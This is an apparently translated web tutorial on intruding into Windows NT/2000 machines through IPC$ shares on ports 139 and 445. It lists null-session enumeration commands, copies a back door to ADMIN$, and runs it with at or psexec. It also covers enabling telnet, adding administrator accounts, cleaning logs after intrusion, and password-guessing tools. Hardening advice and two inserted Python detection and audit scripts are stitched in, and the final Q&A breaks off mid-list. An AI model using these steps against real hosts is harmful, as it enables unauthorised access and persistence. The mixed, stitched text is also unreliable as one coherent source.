Port 445 intrusion details

Source: Internet
Author: User
Tags: file copy, net time


Port 445 intrusion. Before getting into it, we should first look at why port 445 is the port used for the intrusion.
Port 445 is the default port of the IPC$ service.
IPC$
1. Summary
2. What is IPC$?
3. What is a null session?
4. What can a null session do?
5. Ports used by IPC$
6. Significance of the IPC pipe in attacks
7. Common causes of IPC$ connection failure
8. Reasons for file copy failure
9. Limitations of the AT command and of XP on IPC$
10. How to enable IPC$ sharing and other shares on the target
11. Commands that require a shell
12. Commands that may be used during an intrusion
13. Comparison between past and current IPC$ intrusion
14. How to prevent IPC$ intrusion
15. IPC$ intrusion Q&A
16. Closing
1. Summary
Online articles about IPC$ intrusion are everywhere, and the attack steps have practically become a fixed template, so nobody wants to pick up something that has become routine and go over it again. Still, I think those articles are not detailed enough, and some of their content is simply wrong. As a result, questions about IPC$ make up almost half of the discussion on the major security forums, and the same questions come up again and again, which seriously hurts the quality of the forums and how efficiently people learn. So I have put together this summary and hope to make it as clear as possible.
Note: Everything discussed in this article assumes a Windows NT/2000 environment; Win98 is not discussed here.
2. What is IPC$?
IPC$ (Internet Process Connection) is the share that exposes "named pipes": a named pipe opened for inter-process communication. By supplying a trusted user name and password, the two sides establish a secure channel and exchange encrypted data over it in order to access the remote computer. IPC$ is a feature new to NT/2000, and one of its properties is that only one connection can exist between the same two IP addresses at the same time. NT/2000 provides IPC$ and also enables the default shares the first time the system is installed, that is, all logical drives (C$, D$, E$ ...) and the system directory WINNT or Windows (ADMIN$). Microsoft's original intention with all of this was to make administration easier, but, intentionally or not, it reduces the security of the system.
We often hear people talk about the "IPC$ vulnerability". In fact IPC$ is not a real vulnerability; the real issue is the "back door" that Microsoft itself left behind: the null session. So what is a null session?
3. What is a null session?
Before introducing null sessions we need to understand how a secure session is established.
In Windows NT 4.0 a challenge-response protocol is used to establish a session with a remote machine. A successful session becomes a secure tunnel through which both sides can exchange information. The general sequence is as follows:
1) The session requester (client) sends a packet to the session receiver (server) requesting that a secure tunnel be established;
2) The server generates a random 64-bit number (the challenge) and sends it back to the client;
3) The client takes the 64-bit number from the server, encrypts it with the password of the account it is trying to establish the session with, and returns the result to the server (the response);
4) The server receives the response and passes it to the Local Security Authority (LSA). The LSA verifies the response using the correct password of that user and so confirms the identity of the requester. If the requester's account is a local account of the server, the verification takes place locally; if it is a domain account, the response is forwarded to the domain controller for verification. When the response to the challenge is verified as correct, an access token is generated and sent to the client. The client uses this access token to connect to resources on the server until the session is terminated.
That is the general process for establishing a secure session. What about null sessions?
A null session is a session established with the server without any trust relationship, that is, without providing a user name or password. Under the Windows 2000 access-control model a token is still required to establish a null session, but because no user information is authenticated when the session is created, that token contains no user information, and the session cannot exchange encrypted information between systems. That does not mean the null session's token carries no Security Identifier (SID, which identifies the user and group). For a null session the SID in the token supplied by the LSA is S-1-5-7; this is the SID of the null session. The user name is ANONYMOUS LOGON (it can be seen in the user list, but it is not in the SAM database and is a built-in system account). This access token contains the following pseudo-groups:
Everyone
Network
Under the restrictions of the security policy, the null session is granted access to everything the two groups above are allowed to access. So what can a null session do once it has been established?
4. What can a null session do?
On NT with the default security settings, a null connection can be used to list users and shares on the target host, access shares granted to Everyone, and read a small part of the registry; there is no great value in that. It is even less useful on 2000, because in Windows 2000 and later only Administrators and Backup Operators are allowed to access the registry over the network by default, and it is not convenient to do, tools being required.
From this we can see that this untrusted session is not very useful on its own, but as part of a complete IPC$ intrusion a null session is an indispensable stepping stone, because we can obtain the user list from it, and most weak-password scanning tools use that user list when guessing passwords; a successfully exported user list greatly raises the guessing success rate. This alone is enough to show the security risk created by null sessions, so null sessions are by no means useless. The following are some specific commands that can be used with a null session:
1. First, establish a null session (this of course requires the target to have IPC$ enabled).
Command: net use \\IP\IPC$ "" /user:""
Note: The command above contains four spaces: one between net and use, one after use, and one on each side of the empty password.
2. View the shared resources of the remote host.
Command: net view \\IP
Explanation: Once a null connection has been established, this command shows the shared resources of the remote host. If shares are enabled you get output like the following; note, however, that this command does not display the default shares.
Shared resources at \\*.*
Share name   Type   Used as   Comment
-----------------------------------------------------------
NETLOGON     Disk             Logon server share
SYSVOL       Disk             Logon server share
The command completed successfully.
3. View the current time of the remote host.
Command: net time \\IP
Explanation: This command returns the current time of the remote host.
4. Obtain the NetBIOS name table of the remote host (NBT must be enabled on your side).
Command: nbtstat -A IP
Running this command returns the NetBIOS name table of the remote host:
Node IpAddress: [*.*] Scope Id: []
           NetBIOS Remote Machine Name Table
       Name               Type         Status
    ---------------------------------------------
    Server         <00>  UNIQUE      Registered
    OYAMANISHI-H   <00>  GROUP       Registered
    OYAMANISHI-H   <1C>  GROUP       Registered
    Server         <20>  UNIQUE      Registered
    OYAMANISHI-H   <1B>  UNIQUE      Registered
    OYAMANISHI-H   <1E>  GROUP       Registered
    Server         <03>  UNIQUE      Registered
    OYAMANISHI-H   <1D>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered
    INet~Services  <1C>  GROUP       Registered
    IS~Server......<00>  UNIQUE      Registered
    MAC Address = 00-50-8B-9A-2D-37
The above is what null sessions are commonly used for. It seems we can get quite a lot out of them, but note that any attempt to establish an IPC$ connection leaves a record in the event log, whether or not the logon succeeds. Now let's look at which ports IPC$ uses.
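Those event-log records are what a defender works from. The following is an added example, not part of the original article, that runs simple detection logic over constructed Windows Security events (the anonymous SID S-1-5-7 and network logon type 3 from sections 3 and 4, plus share-access and failed-logon events): it flags null sessions, access to IPC$ and the default administrative shares, password guessing, and guessing followed by a successful logon. The field names and the sample events are assumptions constructed for the example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

NULL_SESSION_SID = "S-1-5-7"   # ANONYMOUS LOGON, the SID named in section 3
NETWORK_LOGON = 3              # logon type 3 = network (SMB / IPC$) logon
ADMIN_SHARES = {"IPC$", "ADMIN$", "C$", "D$", "E$"}
TS = "%Y-%m-%d %H:%M:%S"


def _ev(t, eid, src, user, sid="S-1-0-0", logon_type=NETWORK_LOGON, share=None):
    """Build one constructed event record shaped like a 4624/4625/5140 event (assumed schema)."""
    return {"time": datetime.strptime(t, TS), "id": eid, "src": src, "user": user,
            "sid": sid, "logon_type": logon_type, "share": share}


# Constructed sample events, not real telemetry: a null session that lists IPC$,
# six failed logons in a few seconds, a successful admin logon, ADMIN$ access, and
# a normal user touching an ordinary share.
SAMPLE_EVENTS = [
    _ev("2024-01-01 10:00:01", 4624, "10.0.0.5", "ANONYMOUS LOGON", sid=NULL_SESSION_SID),
    _ev("2024-01-01 10:00:02", 5140, "10.0.0.5", "ANONYMOUS LOGON", sid=NULL_SESSION_SID,
        share=r"\\*\IPC$"),
] + [
    _ev("2024-01-01 10:00:%02d" % (10 + i), 4625, "10.0.0.5", "administrator") for i in range(6)
] + [
    _ev("2024-01-01 10:01:30", 4624, "10.0.0.5", "administrator", sid="S-1-5-21-1111-2222-3333-500"),
    _ev("2024-01-01 10:01:31", 5140, "10.0.0.5", "administrator", sid="S-1-5-21-1111-2222-3333-500",
        share=r"\\*\ADMIN$"),
    _ev("2024-01-01 10:05:00", 4624, "10.0.0.9", "alice", sid="S-1-5-21-1111-2222-3333-1001"),
    _ev("2024-01-01 10:05:01", 5140, "10.0.0.9", "alice", sid="S-1-5-21-1111-2222-3333-1001",
        share=r"\\*\Public"),
]


def share_name(path):
    """Share component of a 5140 share path: '\\\\*\\ADMIN$' -> 'ADMIN$'."""
    return path.rsplit("\\", 1)[-1].upper()


def find_null_sessions(events):
    """Successful network logons whose token carries the anonymous SID S-1-5-7."""
    return [(e["src"], e["time"]) for e in events
            if e["id"] == 4624 and e["logon_type"] == NETWORK_LOGON and e["sid"] == NULL_SESSION_SID]


def find_admin_share_access(events):
    """Share-access events (5140) that touch IPC$ or a default administrative share."""
    return [(e["src"], e["user"], share_name(e["share"])) for e in events
            if e["id"] == 5140 and share_name(e["share"]) in ADMIN_SHARES]


def find_password_guessing(events, threshold=5, window=timedelta(minutes=1)):
    """Sources with at least `threshold` failed network logons (4625) inside a sliding window."""
    recent = defaultdict(deque)
    flagged = []
    for e in sorted(events, key=lambda e: e["time"]):
        if e["id"] != 4625 or e["logon_type"] != NETWORK_LOGON:
            continue
        q = recent[e["src"]]
        q.append(e["time"])
        while q and e["time"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold and e["src"] not in flagged:
            flagged.append(e["src"])
    return flagged


def guess_then_success(events, guessing_sources):
    """Sources flagged for guessing that later got a non-anonymous successful logon."""
    hits = []
    for src in guessing_sources:
        fails = [e["time"] for e in events if e["id"] == 4625 and e["src"] == src]
        ok = [e for e in events
              if e["id"] == 4624 and e["src"] == src and e["sid"] != NULL_SESSION_SID]
        if fails and any(e["time"] > max(fails) for e in ok):
            hits.append(src)
    return hits


def analyze(events):
    """Run every check and collect the findings by category."""
    guessing = find_password_guessing(events)
    return {"null_sessions": find_null_sessions(events),
            "admin_share_access": find_admin_share_access(events),
            "password_guessing": guessing,
            "guess_then_success": guess_then_success(events, guessing)}


if __name__ == "__main__":
    for category, hits in analyze(SAMPLE_EVENTS).items():
        print(category, hits)
```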
5. Ports used by IPC$
First, some basic knowledge:
1. SMB (Server Message Block): the Windows protocol family used for file and printer sharing services;
2. NBT (NetBIOS over TCP/IP): uses ports 137 (UDP), 138 (UDP) and 139 (TCP) to implement NetBIOS networking on top of TCP/IP;
3. In Windows NT, SMB is implemented on top of NBT, that is, it uses port 139 (TCP). In Windows 2000, SMB can run either on top of NBT (port 139) or directly on port 445.
With that basic knowledge we can discuss which port is chosen when a network share is accessed:
For a Win2000 client (the initiator):
1. If NBT is enabled, the client tries ports 139 and 445 on the server at the same time. If port 445 responds, the client sends an RST packet to port 139 to close that connection and continues the session on port 445; port 139 is used only when port 445 does not respond. If neither port responds, the session fails;
2. If NBT is disabled, the client tries only port 445; if port 445 does not respond, the session fails.
For a Win2000 server:
1. If NBT is enabled, UDP ports 137 and 138 and TCP ports 139 and 445 are open (listening);
2. If NBT is disabled, only port 445 is open.
The port selection of our IPC$ session follows the same rules. Obviously, if the remote server is listening on neither port 139 nor port 445, no IPC$ session can be established.
6. Significance of the IPC pipe in attacks
The IPC pipe was originally designed by Microsoft to make remote administration easier for administrators, but it seems to make it even easier for intruders to get at hosts. Through the IPC pipe we can remotely invoke some system functions (mostly through tools, and the corresponding permissions are required), which is often what decides whether an intrusion succeeds or fails. Without anyone having planned it that way, the IPC pipe has become a great help to intruders and even the most important channel for delivering files, which is why you constantly see people on the major forums who are stuck because they cannot open the IPC pipe of the target machine. Of course, we cannot ignore the role that permissions play in the IPC pipe; you have surely tasted the frustration of a null session. Without the right permissions you cannot get anything done through the pipe. But once an intruder holds administrator privileges, the IPC pipe shows its vulnerable side.
7. Common causes of IPC$ connection failure
The following are some common reasons an IPC$ connection fails:
1. An IPC connection is a feature specific to Windows NT and later. Because it relies on many DLL functions of Windows NT, it cannot run on Windows 9x/Me; in other words, only NT/2000/XP can establish IPC$ connections with each other, while 98/Me cannot;
2. To establish an IPC$ connection, even a null one, the responder must have the IPC$ share enabled. If the responder has removed the IPC$ share, no connection can be established;
3. The initiator has not started the LanmanWorkstation service (display name: Workstation). It provides network connections and communication; without it the initiator cannot issue connection requests;
4. The responder has not started the LanmanServer service (display name: Server). It provides RPC support and file, printer and named-pipe sharing, and IPC$ depends on it. Without it the host cannot respond to the initiator's connection request, although it can still initiate IPC$ connections itself;
5. The responder has not started Netlogon, which supports pass-through account logon for computers on the network (this does not seem to happen in practice);
6. Ports 139 and 445 of the responder are not listening or are blocked by a firewall;
7. The initiator has not opened ports 139 and 445;
8. Wrong user name or password. In that case the system prints an error along the lines of "unable to update password" (this error obviously does not apply to null sessions);
9. Typing errors in the command: there may be too many or too few spaces. When the user name and password contain no spaces, the double quotation marks around them can be omitted; if the password is empty, just type two quotation marks;
10. If the other side reboots after the connection is established, the IPC$ connection is dropped automatically and must be established again.
In addition, you can analyse the cause from the error number returned:
Error 5, Access is denied: the user you are using probably does not have administrator privileges;
Error 51, Windows cannot find the network path: the network has a problem;
Error 53, The network path was not found: wrong IP address; target is not up; target's LanmanServer service is not started; target's firewall (port filtering);
Error 67, The network name cannot be found: your LanmanWorkstation service is not started, or the target has deleted IPC$;
Error 1219, The credentials supplied conflict with an existing set of credentials: you already have an IPC$ connection with the other side; delete it and reconnect;
Error 1326, Unknown user name or bad password: the cause is obvious;
Error 1792, An attempt was made to logon, but the network logon service was not started: the target's Netlogon service is not started;
Error 2242, The password of this user has expired: the target has an account policy that requires the password to be changed periodically.
8. Reasons for file copy failure
Some friends establish the IPC$ connection successfully but then run into problems during the copy and cannot copy the file. What are the common causes of a failed copy?
1. The recipient does not have a shared folder enabled.
This is the most common error, accounting for more than 50% of cases. After the IPC$ connection succeeds, many friends do not even know whether the other side has a shared folder at all, copy blindly, and are very frustrated when the copy fails. So before copying, use net view \\ip to check whether the share you want to copy to actually exists (a scanner makes this easier), and do not assume that shares exist just because you could establish an IPC$ connection.
2. Copying to a default share fails.
This error is also common and has two main aspects:
1) Many people think that a host which accepts an IPC$ connection must have the default shares enabled, so right after connecting they copy files to the default shares C$, D$, ADMIN$ and so on, and the copy fails as soon as the default shares are not enabled. A successful IPC$ connection shows that the other side has the IPC$ share enabled; it does not show that the default shares exist. IPC$ sharing and default sharing are two different things: the IPC$ share is a named pipe, not an actual folder, whereas the default shares are real shared folders;
2) Because net view \\ip cannot display the default shares (their names end in $), we cannot tell whether the other side has the default shares enabled; if they are not enabled, nothing done against them can succeed. (However, most scanning software can scan for the default shares while it scans for weak passwords, which avoids this kind of error.)
Key point: please be sure to distinguish between IPC sharing, default sharing and ordinary sharing. IPC sharing is a pipe, not a shared folder; default shares are folders shared automatically at installation; ordinary shares are folders that users share themselves.
3. Insufficient user permissions, including:
1) Copying over a null connection to any share (default share or ordinary share): insufficient permissions;
2) Copying to a default share: on Win2000 Pro only members of the Administrators and Backup Operators groups can access these shared directories; on Win2000 Server the Server Operators group can as well;
3) Copying to an ordinary share: you must have the corresponding permissions (the access permissions set in advance by the other side's administrator);
4) The other side may block external access to shares through firewall or security-software settings.
Note:
1. Do not assume that the account named Administrator must have administrator permissions; the Administrator account can be renamed.
2. An administrator can always access the default shares, but not necessarily ordinary shares, because an administrator can set access permissions on a shared folder. For example, if the administrator sets the permissions on the share for drive D so that only the user named xinxin has full access, then even with administrator permissions you still cannot access the D share. However, if the other side has the default share D$ enabled, you can access D$ and bypass that permission restriction. If you are interested, test it yourself.
4. Killed by a firewall, or the host is on a LAN.
Another case is that your copy succeeded, but the firewall or antivirus kills the program when it runs, so the file cannot be found afterwards; or you copied the trojan to a host on a LAN, so the connection to it fails (this does not apply to reverse-connection trojans). If you do not think of this, you will believe the copy had a problem, when in fact the copy succeeded and the problem occurred at run time.
So now you know that all kinds of problems come up in practice with IPC$ connections. The above is a summary of the common errors; if I have missed any, please remind me.
9. Limitations of the AT command and of XP on IPC$
I also wanted to explain why running a program remotely with AT fails, but given the low success rate of AT and the many problems it has, I will not go into it here (the more I say about it, the more people use it). Instead I recommend using psexec.exe to run programs remotely. If you want to run the local file c:\xinxin.exe remotely, and the administrator account is administrator with password 1234, enter the following command:
psexec \\IP -u administrator -p 1234 -c c:\xinxin.exe
If an IPC connection has already been established, the -u and -p parameters are not needed. psexec.exe copies the file to the remote machine and runs it automatically.
Originally I did not want to discuss IPC$ on XP here; I wanted to cover it separately, but I see more and more friends eagerly asking why most operations fail when they run into XP. Here is a simple example. Under XP's default security options, any remote access is granted only Guest permissions; that is, even if you use the Administrator account and password, the permissions you get are only those of Guest. So most operations fail for lack of permissions. So far there is no good way to get around this restriction, so if you really do obtain an XP administrator password, I suggest you avoid the IPC pipe.
10. How to enable IPC$ sharing and other shares on the target
The target's IPC$ cannot simply be opened from outside, otherwise the world would be in chaos. You need a shell on the target with administrator permissions, such as telnet, a trojan or a cmd redirection, and then run the following commands in that shell:
net share ipc$
opens the target's IPC$ share;
net share ipc$ /del
removes the target's IPC$ share. If you want to share a folder, you can use:
net share xinxin=c:\
which shares drive C as the share named xinxin. (I have found that many people wrongly think the command for sharing a folder is net share c$, which really is a mistake; this is a small reference for beginners.) Once again, these operations can only be done in a shell.
11. Commands that require a shell
I can see that many tutorials are inaccurate on this point: some commands that must be run in a shell are simply executed over the IPC$ connection, which is misleading. Here is a summary of the commands that have to be run in a shell:
1. Creating a user on the remote host, activating a user, changing a user's password and adding a user to the Administrators group must all be done in a shell;
2. Enabling IPC$ sharing, default sharing and ordinary sharing on the remote host must be done in a shell;
3. Starting or stopping a service on the remote host must be done in a shell;
4. Starting or killing a process on the remote host also has to be done in a shell (except when using a tool such as pskill).
12. Commands that may be used during an intrusion
For completeness I have listed some common commands used in IPC$ intrusion. If you already know them, skip this section and read on. Note that some of these commands apply to local or remote hosts; those that apply only to the local host can be run against a remote host only after you have obtained a shell on it (such as cmd or telnet).
1. Commands to create/delete an IPC$ connection
1) Create a null connection:
net use \\127.0.0.1\IPC$ "" /user:""
2) Create a non-null connection:
net use \\127.0.0.1\IPC$ "password" /user:"user name"
3) Delete a connection:
net use \\127.0.0.1\IPC$ /del
2. Commands that operate on the remote host over an IPC$ connection
1) View the shared resources of the remote host (default shares are not displayed):
net view \\127.0.0.1
2) View the current time of the remote host:
net time \\127.0.0.1
3) Obtain the NetBIOS name table of the remote host:
nbtstat -A 127.0.0.1
4) Map/delete a remote share:
net use z: \\127.0.0.1\c
This command maps the share named c to the local drive Z.
net use z: /del
This deletes the mapped drive Z; other drive letters work the same way.
5) Copy files to the remote host:
copy path\filename \\IP\sharename, for example:
copy c:\xinxin.exe \\127.0.0.1\c$ copies xinxin.exe from the local drive C to the other side's drive C.
Of course, you can also copy files from the remote host to your own machine:
copy \\127.0.0.1\c$\xinxin.exe c:\
6) Add a scheduled task remotely:
at \\IP time programname, for example:
at \\127.0.0.1 11:00 xinxin.exe
Note: Use the 24-hour clock. If the program you schedule is in the default system search path (such as system32\), you do not need to give a path; otherwise you must give the full path.
3. Local commands
1) View the shared resources of the local host (the local default shares are shown):
net share
2) Obtain the user list of the local host:
net user
3) Display the account information of a local user:
net user accountname
4) Display the services currently started on the local host:
net start
5) Start/stop a local service:
net start servicename
net stop servicename
6) Add an account locally:
net user accountname password /add
7) Activate a disabled user:
net user accountname /active:yes
8) Add an account to the Administrators group:
net localgroup administrators accountname /add
Obviously, although these are all local commands, if you type them in a shell on the remote host, for example after a successful telnet, then these "local" commands apply to the remote host.
4. Other commands
1) Telnet
telnet IP port
telnet 127.0.0.1 23
2) Use opentelnet.exe to enable telnet on the remote host:
opentelnet.exe \\IP administrator-account password NTLM-authentication-mode port
opentelnet.exe \\127.0.0.1 administrator "" 1 90
However, this tool has four requirements:
1) The target has IPC$ sharing enabled;
2) You have an administrator account and password;
3) The target has the RemoteRegistry service running, so that the NTLM authentication mode can be changed;
4) It works only on Win2k/XP.
3) Use psexec.exe to obtain a shell in one step (the IPC pipe must be available):
psexec.exe \\IP -u administrator-account -p password cmd
psexec.exe \\127.0.0.1 -u administrator -p "" cmd
13. Comparison between past and current IPC$ intrusion
Since this is a comparison, I will first write out the old IPC$ intrusion steps for everyone; these are the classic steps:
[1]
C:\>net use \\127.0.0.1\IPC$ "" /user:administrator
\ establish a connection with a blank password
[2]
C:\>net view \\127.0.0.1
\ view the remote shared resources
[3]
C:\>copy srv.exe \\127.0.0.1\admin$\system32
\ copy the one-shot back door srv.exe into the target's system folder; this requires ADMIN$ to be enabled
[4]
C:\>net time \\127.0.0.1
\ view the current time of the remote host
[5]
C:\>at \\127.0.0.1 time srv.exe
\ use the AT command to run srv.exe remotely; the other side must have the Task Scheduler service enabled
[6]
C:\>net time \\127.0.0.1
\ check the current time again to estimate whether srv.exe has run; this step can be omitted
[7]
C:\>telnet 127.0.0.1 99
\ open a new window and telnet to 127.0.0.1 to obtain a shell (what is a shell? think of it as control over the remote machine, operated much like DOS); port 99 is the one-shot back door port opened by srv.exe
[8]
C:\winnt\system32>net start telnet
\ in the shell we just logged into, start the telnet service of the remote machine. After all, srv.exe is a one-shot back door and we need a long-term one for later access; if the other side's telnet is already running, skip this step
[9]
C:\>copy ntlm.exe \\127.0.0.1\admin$\system32
\ in the original window, transfer ntlm.exe; ntlm.exe is used to change the telnet authentication mode
[10]
C:\winnt\system32>ntlm.exe
\ run ntlm.exe in the shell window, after which you can telnet to the host normally
[11]
C:\>telnet 127.0.0.1 23
\ telnet to 127.0.0.1 in a new window (port 23 can be omitted); now we have a long-term back door
[12]
C:\winnt\system32>net user accountname password /add
C:\winnt\system32>net user guest /active:yes
C:\winnt\system32>net localgroup administrators accountname /add
\ once in via telnet you can create a new account, activate guest, and add any account to the Administrators group
Well, I seem to have gone back two or three years. At that time IPC$ was used by everyone, but with the arrival of new tools some of the tools and commands above are no longer commonly used. Let's look at the efficient and simple IPC$ intrusion of today.
[1]
psexec.exe \\IP -u administrator-account -p password cmd
\ with this tool we get the shell in one step
opentelnet.exe \\server administrator-account password NTLM-authentication-mode port
\ with this you can conveniently change the telnet authentication mode and port so that we can log on
[2]
There is no second step. Once you have the shell in one step you can do everything: winshell for a back door, ca for account cloning, 3389.vbe for the terminal service, win2kpass for recording passwords. In short, there are lots of good tools; pick one, and I will not say more.
14. How to prevent IPC$ intrusion
1. Disable enumeration over null connections (this does not stop null connections from being established)
Run regedit, find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] and set the value RestrictAnonymous (DWORD) to 1.
With the value set to 1, an anonymous user can still connect to the IPC$ share but cannot use that connection to list SAM accounts and share information; the value 2 was added in Windows 2000 and prevents users without anonymous access permission from making an IPC$ null connection at all. We recommend setting it to 1. If the key does not exist, create it and set the value. If you find editing the registry awkward, you can set the same thing under Local Security Settings - Local Policies - Security Options - "Additional restrictions for anonymous connections".
2. Disable the default shares
1) View the local shared resources:
Run - cmd - type net share
2) Delete the shares (the default shares come back after a reboot):
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete (if there are drives E, F, ... continue deleting them)
3) Stop the Server service:
net stop server /y (the Server service starts again after a reboot)
4) Stop the default shares from being created automatically (this does not disable the IPC$ share):
Run - regedit
Server: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and set the value AutoShareServer (DWORD) to 00000000.
Pro: find the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] and set the value AutoShareWks (DWORD) to 00000000.
By default these two values do not exist on the host and have to be added manually. After the change, reboot the host for the setting to take effect.
3. Disable the service that IPC$ and the default shares depend on: the Server service.
If you really want to disable IPC$ sharing, disable the Server service:
Control Panel - Administrative Tools - Services - find the Server service (right-click) - Properties - General - Startup type - select Disabled. A message may then tell you that the xxx service will also be disabled and ask whether to continue; some secondary services depend on the Server service, and that does not matter.
4. Block ports 139 and 445
Without these two ports IPC$ cannot be established, so blocking ports 139 and 445 also prevents IPC$ intrusion.
1) Port 139 can be closed by disabling NBT:
Local Area Connection - TCP/IP Properties - Advanced - WINS - select "Disable NetBIOS over TCP/IP"
2) Port 445 can be closed through the registry:
Add a value
Hive: HKEY_LOCAL_MACHINE
Key: SYSTEM\CurrentControlSet\Services\NetBT\Parameters
Name: SmbDeviceEnabled
Type: REG_DWORD
Value: 0
Reboot the machine after the change.
Note: Once both ports are blocked, you cannot use IPC$ to intrude into others either.
3) Install a firewall to filter the ports
5. Set a complex password so that it cannot be guessed over IPC$. I think this is the best way: raise security awareness, which is much safer than endlessly patching.
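To check whether the settings from this section are actually in place on a host, here is an added example (not from the original article) that parses constructed `reg query` and `net share` output and reports which recommendations are unmet: RestrictAnonymous, AutoShareServer or AutoShareWks depending on the edition, SmbDeviceEnabled, and any default shares still present. The modern reg.exe output layout, the `edition` parameter and the sample values are assumptions.

```python
import re

# Registry keys named in this section; value names are compared case-insensitively.
LSA = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"
LANMAN = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"
NETBT = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters"
DEFAULT_SHARE = re.compile(r"^(?:[A-Z]\$|ADMIN\$|IPC\$)$", re.I)

# Constructed sample output of `reg query <key>` (modern reg.exe layout, assumed):
# RestrictAnonymous is 0, AutoShareServer is still 1, SmbDeviceEnabled is absent.
SAMPLE_REG = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    restrictanonymous    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
    AutoShareServer    REG_DWORD    0x1
    AutoShareWks    REG_DWORD    0x0
"""
# Constructed sample output of `net share`; xinxin is an ordinary (user-created) share.
SAMPLE_SHARES = r"""
Share name   Resource                        Remark

-------------------------------------------------------------------------------
C$           C:\                             Default share
IPC$                                         Remote IPC
ADMIN$       C:\WINNT                        Remote Admin
xinxin       C:\
The command completed successfully.
"""


def expected_values(edition):
    """Recommended (key, value name, value) triples; AutoShareServer on Server, AutoShareWks on Pro."""
    autoshare = "autoshareserver" if edition == "server" else "autosharewks"
    return [(LSA, "restrictanonymous", 1),   # stop null-session enumeration
            (LANMAN, autoshare, 0),          # no automatic C$/D$/ADMIN$
            (NETBT, "smbdeviceenabled", 0)]  # SMB not listening on 445


def parse_reg_query(text):
    """Map (key path, lower-cased value name) to its value; REG_DWORD is parsed from 0x.. hex."""
    values, key = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = re.match(r"\s+(\S+)\s+(REG_\w+)\s+(\S+)", line)
        if key and m:
            name, kind, raw = m.groups()
            values[(key, name.lower())] = int(raw, 0) if kind == "REG_DWORD" else raw
    return values


def parse_net_share(text):
    """Share names from `net share`: first token of every row below the dashed header."""
    shares, in_table = [], False
    for line in text.splitlines():
        if line.startswith("----"):
            in_table = True
        elif in_table and line.strip() and not line.startswith("The command"):
            shares.append(line.split()[0])
    return shares


def audit(reg_text, share_text, edition="server"):
    """Return (item, problem) pairs for every recommendation from this section that is not met."""
    findings = []
    values = parse_reg_query(reg_text)
    for key, name, want in expected_values(edition):
        got = values.get((key, name))
        if got is None:
            findings.append((name, "value missing, so the insecure default applies"))
        elif got != want:
            findings.append((name, f"is {got}, expected {want}"))
    for share in parse_net_share(share_text):
        if DEFAULT_SHARE.match(share):
            findings.append((share, "default share is present"))
    return findings


if __name__ == "__main__":
    for item, problem in audit(SAMPLE_REG, SAMPLE_SHARES):
        print(f"{item}: {problem}")
```

On a real host, feed the function the captured output of `reg query` for the three keys and of `net share`; an empty result means every recommendation above is met.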
15 IPC $ featured intrusion Q &
There are a lot of theoretical things mentioned above, but in practice you will encounter various problems, so in order to give everyone the greatest help, I have sorted out some representative questions and answers from various security forums. Some of the answers are my answers and some are replies from the Forum. If you have any questions, please come and discuss them with me.
1. During an IPC$ intrusion, records are left on the server. Is there any way to keep the server from discovering them?
A: Yes, records are left. You can use a log-cleaning program to delete the logs before you leave, or carry out the intrusion through a bot (another compromised host).
2. Why can I connect but not copy? The following is shown:
net use \\***.***\IPC$ "password" /user:"username"
The command completed successfully.
copy icmd.exe \\***.***\ADMIN$
The network path was not found.
(command failed)
A: For errors such as "network path not found" and "network name not found", the reason is usually that the share you are copying to is not enabled, so the copy fails; try another shared folder.
3. The target has IPC$ and I can establish a null session, but the C and D drives ask for a password. I know a null session has few permissions, but is there really no other way?
A: Use Fluxay (流光) or another scanner to guess the password. If you cannot guess it you can only give up; a null session is, after all, very limited.
4. I guessed the administrator password and the IPC$ connection succeeded, but net view \\IP shows that the default shares are not enabled. What should I do?
A: First, a correction: net view \\IP does not list the default shares. Try copying a file to C$ or D$; if none of them works, the default shares are disabled, and you can use opentelnet.exe or cmdxec.exe.
5. After the IPC$ connection succeeded I used the following command to create an account, and found that the account appeared on my own machine. What went wrong?
net user ccbirds /add
A: A successful IPC$ connection only means you have a communication tunnel to the remote host; it does not mean you have a shell. Only after obtaining a shell (telnet, for example) can you create accounts on the remote machine; otherwise the command runs locally.
6. I have a bot: with the administrator account I can read the system time, but copying a program to it fails every time with "Access is denied. 0 file(s) copied." Is some service missing on the other side? What should I do?
A: "Access denied" generally means insufficient permissions. It may be a problem with your account; another possibility is that you are copying to an ordinary share whose permissions do not include you (even if you are an administrator). I analysed this earlier in this article.
7. Can I establish an IPC$ connection to the target from Win98?
A: In theory this does not work. We recommend using Win2000 for IPC$ operations; other operating systems cause a lot of unnecessary trouble.
8. I used net use \\IP\IPC$ "" /user:"" to create a null session successfully, but nbtstat -A IP cannot export the user list. Why?
A: By default a null session can export the user list, but if the administrator has modified the registry to disable it you will see what you describe. It is also possible that NBT is not enabled on your machine; the nbtstat command is built on NBT.
9. When I establish the IPC$ connection the following is returned: "The credentials supplied conflict with an existing set of credentials." What is the problem?
A: You already have an IPC$ connection to the target host. Two IPC$ connections between the same two hosts are not allowed.
10. The following appeared while I was mapping a drive:
F:\> net use H: \\211.161.134.*\e$
System error 85 has occurred.
The local device name is already in use.
What is going on?
A: You are too careless: this means you already have an H: drive. Map to a drive letter that does not exist!
11. I established a connection successfully with F:\> net use \\*.*.*.*\IPC$ "123" /user:"guest", but mapping failed and asked me for a password. Why?
F:\> net use H: \\*.*\C$
The password is invalid for \\*.*\C$.
Enter the password for \\*.*\C$:
System error 5 has occurred.
Access is denied.
A: Well, being asked for a password means the user you are currently using does not have enough permissions to map C$, which is a default share. Try to raise your privileges or find an administrator with a weak password; the default shares usually require administrator permissions.
12. SuperScan found a host with port 139 open, but why can't I establish a null session to it?
